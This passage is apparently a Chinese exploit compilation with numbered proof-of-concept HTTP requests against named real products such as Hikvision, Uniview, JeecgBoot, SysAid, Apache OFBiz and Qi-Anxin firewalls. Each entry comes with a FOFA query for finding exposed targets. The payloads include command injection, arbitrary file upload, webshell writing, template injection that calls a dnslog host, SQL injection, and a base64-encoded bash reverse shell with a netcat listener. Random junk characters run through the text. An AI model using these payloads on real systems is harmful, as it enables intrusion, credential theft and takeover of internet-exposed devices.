4 y3 v/ F7 f. s& gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: ^9 Z* x$ j% v( G' n' Y" F
Connection: close
7 @# Z- r2 p6 c* Q/ u) ?Content-Length: 336
0 v0 ~* g( \% g. d$ }' j3 CAccept-Encoding: gzip: P/ }" _( ~; ]
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l3 Z* ^- J( E8 N% K4 B3 M; ?8 H

" f  q" m! f  H- U8 T, r% j( ^------YsOxWxSvj1KyZow1PTsh98fdu6l5 \$ R' R# E" Z3 ]' |
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
! j# Y' g* e# ?4 r; ~6 xContent-Type: image/png
8 m2 w/ F9 I! ]% Z
- Z' ?/ A# x6 P: m" pYsOxWxSvj1KyZow1PTsh98fdu6l
: ]7 q- b5 i' B* z------YsOxWxSvj1KyZow1PTsh98fdu6l6 x$ p, p: G/ J5 m1 C1 W& x8 @
Content-Disposition: form-data; name="target"+ d  L0 P1 _! H, K$ Z6 |; F

0 D: j4 F7 {' m1 T# }/ H; n/Applications/SkillDevelopAndEHS/. N# P  F& l3 f8 |# [
------YsOxWxSvj1KyZow1PTsh98fdu6l--: a2 f' [+ z6 j* o( j8 A
3 x( z3 t: j5 |: d3 N
: @9 X& _( j8 I# b& E
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.14 B- T# J3 f3 g3 A8 I0 P
Host: x.x.x.x
: N1 d. o! \) \7 o" q# ]9 o
+ Z: n% [' e% R5 S, M4 N+ |0 ?/ {- d7 ?$ f# r" o
79. BYTEVALUE 百为流控路由器远程命令执行
4 Z5 G9 e) i) z3 h7 ]+ WFOFA:BYTEVALUE 智能流控路由器
- @1 C3 P5 J  A9 s* w$ c- F$ OGET /goform/webRead/open/?path=|id HTTP/1.13 m0 G- m! ]/ e' ^& V* {5 _
Host:IP$ k+ p5 ~- ?, @2 D8 {! d( v. r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.05 h/ \, u- x- S. \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ s: f5 e8 C! y5 s7 q" i. B: ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* _0 X. q! r8 u; I& pAccept-Encoding: gzip, deflate0 ~, \, \  D% ^7 c5 S; n2 m
Connection: close
" l% S5 m" o% g+ O! S! K" KUpgrade-Insecure-Requests: 1
, O, h$ h+ G$ H/ T7 X0 @; g2 A1 A& n$ E9 m

) A5 S. y" J5 W4 h80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传" @/ J; x4 J8 A& [, n: u: c  U3 O
FOFA:app="速达软件-公司产品"$ n$ T0 e5 x8 J! w& [6 I
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
& q' s% e" j  B* |/ WHost: x.x.x.x9 C+ i+ k6 {  \" ?9 e8 @" S* k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 d  b5 P2 P- A9 v8 w( ]% bContent-Length: 27
6 T& n  t. g3 t' E2 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: c4 H4 ^; T% x! Z2 K. n
Accept-Encoding: gzip, deflate! z; }& B! o2 d0 A2 O0 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* E" ^' s/ D; t4 k% U
Connection: close
4 s9 j* U! U3 U+ N/ h" cContent-Type: application/octet-stream
6 ^# J6 ?" J* _: ~  {4 tUpgrade-Insecure-Requests: 11 V3 B. y5 I" H" {

; x4 @: L8 ]# E) R3 h<% out.print("oessqeonylzaf");%>( ^- _% B+ k2 D) q9 m/ ~( u
# @2 l9 T$ \# `0 e  E- }
; d( C1 h# Y( B+ a8 k
GET /xykqmfxpoas.jsp HTTP/1.1
3 x6 K4 F6 s1 P- c- |Host: x.x.x.x
2 A# f5 `+ z- Y3 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 }) q, u. c8 F& v% x9 fConnection: close4 K8 j  y3 `; I) J9 E9 m3 _$ @
Accept-Encoding: gzip
: @. O7 w; j1 N' Y1 G' o
  w7 r8 q' K1 X) e; S1 V1 x
) f- I3 ^. R( \& ]8 f( x! [81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 Q+ L4 W# W; }/ w' ~FOFA:app="uniview-视频监控"" c# U5 X" L( L
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1' }6 F* j  u6 n& i0 ^& F3 B
Host: x.x.x.x$ y# w, G/ E2 c) A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( ~8 S  L4 G7 x5 j1 }1 e
Connection: close6 T1 k" g7 S1 O& ^; M9 E7 J
Accept-Encoding: gzip
) R: x2 F, h8 m. h/ b
8 D3 q: y4 W" \3 T
( P  D* D3 z9 |5 ^% Y82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
2 A' Q0 q# c$ j  _; p( d2 KFOFA:app="思福迪-LOGBASE"
' c/ _# x' q9 I3 m) g) m* XPOST /bhost/test_qrcode_b HTTP/1.14 k* I) C' ^  e9 z
Host: BaseURL. e* h! c/ q7 F
User-Agent: Go-http-client/1.11 u5 Z; M8 ~7 o
Content-Length: 237 @5 Z8 p6 F. R% D& T
Accept-Encoding: gzip
0 j  {  t# Y5 _' C) hConnection: close9 Z6 s, c- h0 z9 u+ B8 U7 U0 Z
Content-Type: application/x-www-form-urlencoded4 T4 G+ s5 G/ ~- Z5 {& c1 w
Referer: BaseURL0 X9 o' a' ~; j) T" L
5 ~  X# r7 N8 Z* p  e& y% q
z1=1&z2="|id;"&z3=bhost: ^/ n4 N8 ]0 V; b

2 G! [; ?2 R9 T  U. z5 |* |3 s, y5 y0 v, _9 u
83. JeecgBoot testConnection 远程命令执行; z! S5 x( @( l) ?7 z
FOFA:title=="JeecgBoot 企业级低代码平台"
9 p* Q& S2 H! D6 ~* J% I/ {2 w( ~: T$ G' q* p6 j) K$ g
$ q( C# ^9 {/ q
POST /jmreport/testConnection HTTP/1.1! ]; u" z) E" f9 R3 X+ ~
Host: x.x.x.x
* Q: T; y- G* w* E, BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  R7 H( \# w  y" J4 g
Connection: close
2 c7 F9 J4 g" w% xContent-Length: 8881
9 N5 y2 q& _, W6 I) D, ^: FAccept-Encoding: gzip- i/ Z. l" j+ M0 N. p* R
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
5 y$ y# r- k% F" L- VContent-Type: application/json
: b7 ^; O4 w$ K* ~) R. T- S6 v  S' C1 e5 ?3 S2 r
PAYLOAD
/ G4 ?# |0 _% {- {; ~" J" ~/ v9 m
; t7 `8 q; g& G. u/ _3 D8 ?84. Jeecg-Boot JimuReport queryFieldBySql 模板注入1 F/ k" d; c8 `. [) K, |
FOFA:title=="JeecgBoot 企业级低代码平台"; P9 S( ^) O2 b1 {& h

  `/ [+ u. a$ [6 H9 S5 {
( K& l  o3 W# P" O
% u% F! ~7 q1 {' T7 |! l- t. ZPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
1 u; o% y  A; b) q8 ~Host: 192.168.40.130:80807 e4 {! j% w* y& ?2 F
User-Agent: curl/7.88.10 r; T- N7 R1 `2 j# L" Y/ ^# p; d
Content-Length: 156
6 ^( s) d5 `" ]1 y& oAccept: */*
6 b2 ^+ E' P0 G. A( g9 QConnection: close
/ C, b- l& F) x& m) ^& nContent-Type: application/json
, k/ R1 }" G8 u$ v- T1 sAccept-Encoding: gzip
; X- l5 L& v: R! ?/ U5 D- G' [! t) ?! d8 S0 f
{0 a3 ^9 b6 A& R7 s1 }; d) i7 |
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",& ]' ]. B) ^) a0 V( B' u* J7 S& m
  "type": "0"
2 a6 n& s7 ?* f' [* k# o. |}
1 E( Z8 _& W9 x5 J
6 i/ k& b3 f% t4 `4 _  T6 d/ P
) I2 q! c6 r5 ]. Z6 _85. SysAid On-premise< 23.3.36远程代码执行
3 H  `2 r- J+ z5 |CVE-2023-47246  q* g0 l" q  N$ i
FOFA:body="sysaid-logo-dark-green.png" ' z' C! {2 w0 }4 T$ v& {
EXP数据包如下,注入哥斯拉马, }; u5 z- g' G& G2 O  s  Q% c
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1. V0 A0 h! y% _% z( S2 p
Host: x.x.x.x
! X6 e6 f( h  G# f" T7 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- p) K+ k" L2 g# q# N
Content-Type: application/octet-stream
8 z/ c6 J  B3 `1 VAccept-Encoding: gzip5 t( P' Y( A3 a. B
1 o' L" v! U6 ^; m
PAYLOAD
4 K% q0 s, j; J6 a% O3 I$ ^. E1 T: @' ]  O
回显URL:http://x.x.x.x/userfiles/index.jsp: T" ?, M* }* J, R
' e7 D2 U3 i/ Y) q& y
86. 日本tosei自助洗衣机RCE
0 F- t7 h" L  q. G# g; x6 AFOFA:body="tosei_login_check.php"
) E) i# _, U4 B3 D, C& G" u" e% YPOST /cgi-bin/network_test.php HTTP/1.14 S, M  p2 x  V) o, L8 F
Host: x.x.x.x
5 l$ H5 s0 R! P0 k* y/ P+ d" n9 oUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 C, J1 r, f3 tConnection: close/ P& d4 _! L! L9 I
Content-Length: 441 {9 f6 y5 @9 P9 @9 ?
Accept: */*
4 j0 r" D6 q/ G; C0 @# }8 j  dAccept-Encoding: gzip/ J* v" O! \" A6 f9 n
Accept-Language: en. W, N+ j- i% X
Content-Type: application/x-www-form-urlencoded6 H$ T6 M0 N" ?

; K  a; Q4 t% Shost=%0acat${IFS}/etc/passwd%0a&command=ping
1 y% _9 B/ X4 x6 ^( Q9 E' o: T& a- _: V$ h
1 G0 G) E  i' p- T
87. 安恒明御安全网关aaa_local_web_preview文件上传
" k$ O! @$ Z8 i3 r% I, LFOFA:title="明御安全网关"! ~6 l- n+ p" u" B: l: y) C3 J3 a! X
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1% Q9 L; D6 w; I2 N% j0 i
Host: X.X.X.X' X* Y5 Z4 L4 c& F( f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" E, b/ S. S3 L7 o" j
Connection: close
$ ^& c3 h5 B3 P* T8 u" ~Content-Length: 198
- N# b- F: W( z0 t, y& p8 y. mAccept-Encoding: gzip" {- W1 z. X' q2 P# I- b8 F- y1 N
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
: M: h$ J. @2 v) z4 }) r# I7 n6 M+ t$ q4 G: F' N6 Q) a
--qqobiandqgawlxodfiisporjwravxtvd6 W# ^8 D6 E# k7 s; G
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
  z5 W) T& h- V# z6 O  B3 eContent-Type: text/plain. S. Q7 @: j" a1 u

, I6 m4 [! o! C% {% Y2ZqGNnsjzzU2GBBPyd8AIA7QlDq/ N7 N" A6 K9 r! |4 y
--qqobiandqgawlxodfiisporjwravxtvd--
4 y7 i* L: C& ^) y3 S
! e+ c# V' q0 r9 J; Q$ m& Z3 u8 ]) ^2 G' J* ~
/jfhatuwe.php0 _5 D( g8 v2 L4 E4 ?8 m1 L

/ n. ~7 \  O+ M$ V$ P88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
- \% X5 r$ t7 ]4 Y4 }FOFA:title="明御安全网关"/ k/ {/ R$ s5 f& ?
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
4 ?# T! K- i$ q; kHost: x.x.x.xx.x.x.x
7 K6 p" Y# V, K) q  h$ b: C! w: TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ ^) ^5 X' b+ a2 q, E! H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 P. Q( [5 S/ R" }& ?" u( f
Accept-Encoding: gzip, deflate4 Q- L9 B" M& \5 i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! N2 A1 `7 {3 P2 p6 U4 ?) y: E) m0 `
Connection: close$ N& j/ P  x8 d

( u2 o; Z$ B) t; [$ i
& X' s; c$ W& Y. ]9 `& w6 g5 X/astdfkhl.php
' p. w) M  }' r/ }) l) l' p9 R+ x) a& p& x0 l  h8 F
89. 致远互联FE协作办公平台editflow_manager存在sql注入
  p! S; o0 b4 }9 w% [: T% r: wFOFA:title="FE协作办公平台" || body="li_plugins_download"
2 j1 `1 i: l& @1 W1 bPOST /sysform/003/editflow_manager.js%70 HTTP/1.11 a# W( m& g/ _# \
Host: x.x.x.x
! B& G# `7 C: a! \) ?# e  g/ b" KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 |& V$ D4 Y3 ^1 r0 A) K2 UConnection: close
$ s1 c. y: c4 |+ R4 bContent-Length: 41
7 u+ h+ g  B2 W1 z$ eContent-Type: application/x-www-form-urlencoded
% ^6 K! Q0 w( e$ s# L: {- L' iAccept-Encoding: gzip" b2 I  z: k  M! b, x
9 G/ e7 j- F  g, ~; e
option=2&GUID=-1'+union+select+111*222--+- E( u. U# t  B$ ~7 J9 F1 j$ w; V* L$ f& _
8 o- [0 J" _5 G: t) f* R5 w! s

5 {+ h8 ~( G9 g) ^$ i4 S3 D90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
6 D$ `+ `) @! }7 W! RFOFA:icon_hash="-1830859634"- C# P' G/ }; ], ^: O
POST /php/ping.php HTTP/1.1
& Z" T! M" W( j6 LHost: x.x.x.x
- l. U% b5 n) z2 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
$ a0 |7 \6 s9 b/ L, |+ {Content-Length: 51" ~( l$ A2 x; ]% p, s' _
Accept: application/json, text/javascript, */*; q=0.018 M" ~% h* ~5 d2 g) g* ?; p
Accept-Encoding: gzip, deflate
: q/ c) e* e# U4 e6 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 t% S: L$ |' f3 _5 q( r. U
Connection: close
5 ?+ J2 [3 X. k4 fContent-Type: application/x-www-form-urlencoded4 O9 n* l6 _8 c! p  j3 S) d
X-Requested-With: XMLHttpRequest* Z' C. w( N( Z8 i% @) |

% s/ L( g% `7 P/ @! W6 Ejsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig, P& A1 c5 ?7 L. L, L8 t" Y+ {' E: z7 c

+ I0 ?3 X+ s3 k. T) A2 O$ e% x; f% F" \2 [0 F: @9 a
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ u' o6 O- C, R9 u7 i2 VFOFA:title="综合安防管理平台"; H; z! ^! f9 ~4 D( ?$ M( m" v2 p
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
" i; x- C% B( a* B7 WHost: your-ip' Z3 _& d& a: ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; O( G3 \4 K" W" q. |7 [0 RAccept-Encoding: gzip, deflate
- p3 X9 \0 y. d  tAccept: */*
: ~5 v' r$ o: G3 h: n2 N  mConnection: keep-alive
- }) r+ d: q1 C7 ]* X8 U8 P' m& g0 A( Z( K9 C7 J/ M

- y1 o8 N+ E; g/ Q
1 g" @. _& T5 ^5 G92. 海康威视运行管理中心session命令执行+ \( d/ J) O/ m1 Z1 B6 n0 g
Fastjson命令执行" k7 M, ?. j$ \+ n0 K
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
! F7 O# Z0 ~, WPOST /center/api/session HTTP/1.1
1 F! \! E: W5 rHost:
9 }1 H; E2 @. c* V/ u3 W2 RAccept: application/json, text/plain, */*
* Z. Y$ f: a' p; Q. O/ d5 E. ]Accept-Encoding: gzip, deflate0 O! u( d6 o7 s  G: o; R
X-Requested-With: XMLHttpRequest$ U2 d" I8 Y, }( r1 c3 F
Content-Type: application/json;charset=UTF-8
6 k9 U' ?. Q7 p* z8 [- jX-Language-Type: zh_CN
0 C/ d( d- I  s! ]2 hTestcmd: echo test
0 C8 b/ e; @3 x, Q9 x4 H% {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
7 P  [( E- {+ k$ I" K9 xAccept-Language: zh-CN,zh;q=0.9
% P/ A# h9 {$ j* U% c* yContent-Length: 5778
! t$ L# i0 ~+ h9 M7 j0 m8 X/ }
/ x. a; p" y/ T; S: xPAYLOAD) ]. C, n1 p( k
+ |1 _8 n! k4 V: l& c
: b% @* q/ J3 N8 c# \# e! e
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传3 m- F6 q& N8 U. }: g0 Y
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
$ o3 q* E: d7 b1 H( pPOST /?g=app_av_import_save HTTP/1.1
8 t1 }, i; \: ]% ?  eHost: x.x.x.x
" t. @9 e1 n* d' w  @% OContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx" R+ r/ d8 a% x. F1 ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 s, a9 ]4 j9 e' i

! R& N- S8 u* d6 `, x------WebKitFormBoundarykcbkgdfx
; u  l' b7 U) ]" w( e; `& ^Content-Disposition: form-data; name="MAX_FILE_SIZE"
( t8 Q2 P$ n+ e" c
+ a# G7 o: v$ e( t# D1 v( C# e100000000 Q1 ^) Y; g/ ?6 T% ~
------WebKitFormBoundarykcbkgdfx' Q& t, O2 `6 O$ d" {- B
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
8 q7 ^( Y, `. d% Z* E! w' {3 pContent-Type: text/plain
: D2 ]" [& o- I. D) o$ \4 M% m1 q1 V) h9 X5 ^
wagletqrkwrddkthtulxsqrphulnknxa
/ n1 K5 v/ u0 ~5 ^+ H------WebKitFormBoundarykcbkgdfx
3 x, H* ~; N8 I/ A+ EContent-Disposition: form-data; name="submit_post"
( A: Q2 W( B. o' s. U0 q+ l; X$ ~1 z
obj_app_upfile0 n  Q  T, q8 v. s3 ^
------WebKitFormBoundarykcbkgdfx
+ X7 m. ^) k: `3 k! f7 p6 V  D0 ^Content-Disposition: form-data; name="__hash__"
  y: S/ |4 _3 K3 t! s( @0 l* g" d
+ f' z6 S/ r/ r0 l1 s' E- @0b9d6b1ab7479ab69d9f71b05e0e9445/ }* c: l1 {$ h# f& ^7 k
------WebKitFormBoundarykcbkgdfx--( A1 X$ q) @2 k0 U; M+ u& F* U/ t
4 e* _5 v, O% u% U7 C6 N5 B

8 g7 w6 l( z' }5 X. gGET /attachements/xlskxknxa.txt HTTP/1.1
& s* i# `' z! `" }0 B) X1 h1 NHost: xx.xx.xx.xx) [! W  f9 y( q+ j& `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! F3 j; Y- O0 \  y) l6 K( Z# c% v8 U; x3 G! @# t! W
% B/ O2 c5 p" p  ^, ~# }  O
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
  i/ g/ ^" g8 P0 r' D4 YFOFA:fid="1Lh1LHi6yfkhiO83I59AYg==". r. V3 V; s- P+ D
POST /?g=obj_area_import_save HTTP/1.1
$ m2 t4 s+ l% a+ \Host: x.x.x.x  c; B, c+ @$ T
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
1 B5 r; z% e3 p% \2 J8 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 I7 ]! H  r" q: ]) F5 u: T
% Z/ o- G  k8 Q/ Q* b7 P5 m2 E------WebKitFormBoundarybqvzqvmt
" B' f) }7 ~) ^- \& k0 z/ ?Content-Disposition: form-data; name="MAX_FILE_SIZE") s$ D& D# |  v( M: m# u3 [' w3 r
; S7 ~% S* j9 D$ E5 h" V# @
10000000/ u1 w1 ?# i. c# T/ Y. H4 c8 T0 ~
------WebKitFormBoundarybqvzqvmt7 m8 U, b/ T0 G
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"$ z; C. `3 }$ P3 D
Content-Type: text/plain% m; r* q4 a5 W3 M- X, O* n* l0 n$ r

( f( F9 g) D8 Z2 w! N( xpxplitttsrjnyoafavcajwkvhxindhmu5 E. T  J* ^) @. f
------WebKitFormBoundarybqvzqvmt
3 V0 T( k" Y9 L9 Y1 {3 P9 U( lContent-Disposition: form-data; name="submit_post"
3 {- d2 |6 W5 ^5 a
1 K6 _# H0 H' Oobj_app_upfile8 X4 B& X( o# X: R" [! k8 c. K: U
------WebKitFormBoundarybqvzqvmt) n. H% N' U2 W, w$ r
Content-Disposition: form-data; name="__hash__"9 F- |% U5 W4 i2 y

/ Q$ ?% J) [$ d0b9d6b1ab7479ab69d9f71b05e0e9445
+ l. J4 q3 K6 ~$ p! A3 D+ @------WebKitFormBoundarybqvzqvmt--/ b3 m& l" ^% N+ h" F1 y

, z  O7 V( g, [% p2 J5 ^' A6 R2 {  Q) ~6 u4 F8 K

% c4 G" d* F& S0 }GET /attachements/xlskxknxa.txt HTTP/1.1$ W# _( H2 W5 ~! I$ _7 ^5 Q
Host: xx.xx.xx.xx6 [  Y" @( X% |/ j, C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- J+ z) ~3 z7 Q# m

" J- B1 q( Z0 L: O; l" X
. S: X5 `+ s& i6 z# B
6 }8 r& e0 X% t  i' R% w95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行3 Z9 d6 S2 @2 S" P
CVE-2023-49070
/ g* s8 D7 _, ?4 `3 T6 e/ ^FOFA:app="Apache_OFBiz"
# j! ]( `5 y7 f) S! F/ U; g3 OPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
$ p9 [5 W3 o6 L! ~2 v6 ?' k* dHost: x.x.x.x
6 Y" x0 @* M/ v: D+ AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' F! R* v$ i' A0 q. DConnection: close5 R& g2 d" N* }" o5 m
Content-Length: 889) j. w' P9 ]1 @9 H5 y9 I
Content-Type: application/xml/ Q6 ^+ h1 X' s+ x# a' L
Accept-Encoding: gzip# S# N" j) c) g5 u. D) o/ f
9 r  `7 ~5 w. p# d3 `1 z8 n+ P
<?xml version="1.0"?>, i: K0 Y1 `* o
<methodCall>  D) A7 h8 ?' L3 N% E, W3 \0 b- R( `
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
: f) n/ B" x# h- s    <params>+ `# B+ O: Z5 E$ w
      <param>3 p6 a- O5 V& A. H. ^; B
      <value>) A+ b9 ]) E9 s1 x- f
        <struct>& M+ E' ~# B7 p1 C( W
       <member>
& p) |7 E1 J  }: r! K          <name>test</name>" Z; n+ \" v; q+ O
          <value>( M3 l  J6 ]9 o: ]5 U0 H' s
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
* j; @0 ]# Y  j6 R/ ^/ O3 i# Q          </value>5 Y5 V2 W6 }# s( H* M9 T& a, f
        </member>& i/ Y' D6 l4 X$ H5 \% x
      </struct>0 g# M5 I+ Z! p. t& E, c2 O
      </value>
. w$ w& S" ], Z6 i- V    </param>6 \# R3 f5 C( {, O
    </params>
( H8 t$ L. R0 g( s- V7 z  H$ |</methodCall>
1 A5 V$ N# |2 @$ N1 u7 M0 v8 a
4 W& H; g) a: a( G0 X! s; f- F/ i# o( K3 M9 m, u0 G4 p
用ysoserial生成payload6 a8 [+ g8 Y7 ~  `$ O* D/ k. b7 \& e) r
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n": ?+ F' m! g5 k- r

2 B- X, E' k- j; m8 ^
, o) j* H' u1 B1 j: Q6 l将生成的payload替换到上面的POC
6 a7 R3 R2 R7 LPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 }0 N; `! f/ G: |0 F% [
Host: 192.168.40.130:8443
* h2 Z/ y% Z2 q$ T0 NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 x! L! v1 p/ c, _% _  M/ r; ^+ A
Connection: close
4 J' B# H3 s7 G! q4 |8 \4 k" fContent-Length: 889* n% v! q5 p: i. r. s. D2 g! N
Content-Type: application/xml( {: q# C  w* V
Accept-Encoding: gzip
" }6 w8 p# ]1 ]/ m( ^+ @. [) j& V% N5 p2 u+ g% u9 A3 T6 w1 q
PAYLOAD
9 j" B2 J9 B: c: z; f" T: {5 z: Q( w/ x
96. Apache OFBiz  18.12.11 groovy 远程代码执行6 V7 G2 n9 H% y' R1 n! j
FOFA:app="Apache_OFBiz"7 J" o' [* n1 J& e9 e7 ~' i; L
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; h& `3 i' r8 @7 B7 c! _
Host: localhost:8443
9 D! ?8 b7 r% j2 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' u: k- k/ z! C& y
Accept: */*$ g6 T8 ]) R% ?9 [* `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 n% ^3 y& x8 ]" ~  i3 y) SContent-Type: application/x-www-form-urlencoded
- z* g/ s& N% g; {2 D; vContent-Length: 55
- y) s8 u; i; a4 b6 j
! d: ]) [" L1 J- \groovyProgram=throw+new+Exception('id'.execute().text);
6 w+ K* ?  B' Z/ {1 e3 F, u2 n
1 }8 v9 g  y# j9 T' J8 J2 X
' Y" e- e6 t& V2 L反弹shell
6 B, J! j' k  E) v# r在kali上启动一个监听
3 W0 ~2 z4 S% D' X% H' wnc -lvp 7777
% F: ?( ]6 X- i- n4 C
! O- ~# d/ a0 V! B' m% hPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1+ m' r) a3 c8 h7 I1 e( f- M
Host: 192.168.40.130:8443
9 ]- A  g+ ?0 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( `- V# j4 J4 @: f7 ~: r" AAccept: */*
. L9 y+ y2 K" @+ `) |1 N! mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 Y' y2 A) K& D( NContent-Type: application/x-www-form-urlencoded
, x, ?& N8 l9 H6 d7 iContent-Length: 71
0 L" {; |" r& z" D
: ~3 Z7 N$ r+ Z. k  o+ B4 `7 m) WgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();) O$ m* [: O; e: g4 \" l6 @6 j

4 g# p* j# z/ H: |; ^) ?97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行, b5 q+ {+ ?1 P9 s
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
